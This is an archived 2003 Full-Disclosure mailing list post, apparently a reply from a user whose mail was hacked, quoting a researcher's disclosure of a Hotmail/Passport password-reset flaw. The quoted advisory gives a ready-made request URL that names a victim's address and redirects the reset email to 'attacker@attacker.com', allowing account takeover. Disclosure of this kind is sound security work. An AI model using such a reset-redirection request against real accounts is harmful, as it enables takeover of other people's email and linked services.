lists.openwall.net | lists / announce owl-users owl-dev john-users john-dev passwdqc-users yescrypt popa3d-users / oss-security kernel-hardening musl sabotage tlsify passwords / crypt-dev xvendor / Bugtraq Full-Disclosure linux-kernel linux-netdev linux-ext4 linux-hardening linux-cve-announce PHC | |
Open Source and information security mailing list archives
| ||
|
Message-ID: <20030508045139.10803.qmail@hackermail.com> From: xploit at hackermail.com (dong-h0un U) Subject: Hotmail & Passport (.NET Accounts) Vulnerability I encountered my mail hacking by this method. And looked for a person who hack it. This method could not be exhibited easily so. Thank at your information. :-) P.S: Sorry for my poor english. Hotmail's engineers desire to solve bug fast. ----- Original Message ----- From: Muhammad Faisal Rauf Danka <mfrd@...itudex.com> Date: Wed, 7 May 2003 19:50:51 -0700 (PDT) To: full-disclosure@...ts.netsys.com Subject: [Full-Disclosure] Hotmail & Passport (.NET Accounts) Vulnerability > Hotmail & Passport (.NET Accounts) Vulnerability > > There is a very serious and stupid vulnerability or badcoding in Hotmail / Passport?s (.NET Accounts) > > I tried sending emails several times to Hotmail / Passport contact addresses, but always met with the NLP bots. > > I guess I don?t need to go in details of how cruical and important Hotmail / Passport?s .NET Account passport is to anyone. > > You name it and they have it, E-Commerce, Credit Card processing, Personal Emails, Privacy Issues, Corporate Espionage, maybe stalkers and what not. > > It is so simple that it is funny. > > All you got to do is hit the following in your browser: > > https://register.passport.net/emailpwdreset.srf?lc=1033&em=victim@hotmail.com&id=&cb=&prefem=attacker@attacker.com&rst=1 > > And you?ll get an email on attacker@...acker.com asking you to click on a url something like this: > > http://register.passport.net/EmailPage.srf?EmailID=CD4DC30B34D9ABC6&URLNum=0&lc=1033 > > From that url, you can reset the password and I don?t think I need to say anything more about it. > > Vulnerability / Flaw discovered : 12th April 2003 > Vendor / Owner notified : Yes (as far as emailing them more than 10 times is concerned) > > > Regards > -------- > Muhammad Faisal Rauf Danka > > _____________________________________________________________ > --------------------------- > [ATTITUDEX.COM] > http://www.attitudex.com/ > --------------------------- > > _____________________________________________________________ > Select your own custom email address for FREE! Get you@...rchoice.com w/No Ads, 6MB, POP & more! http://www.everyone.net/selectmail?campaign=tag > _______________________________________________ > Full-Disclosure - We believe in it. > Charter: http://lists.netsys.com/full-disclosure-charter.html > -- _______________________________________________ Get your free email from http://www.hackermail.com Powered by Outblaze
Powered by blists - more mailing lists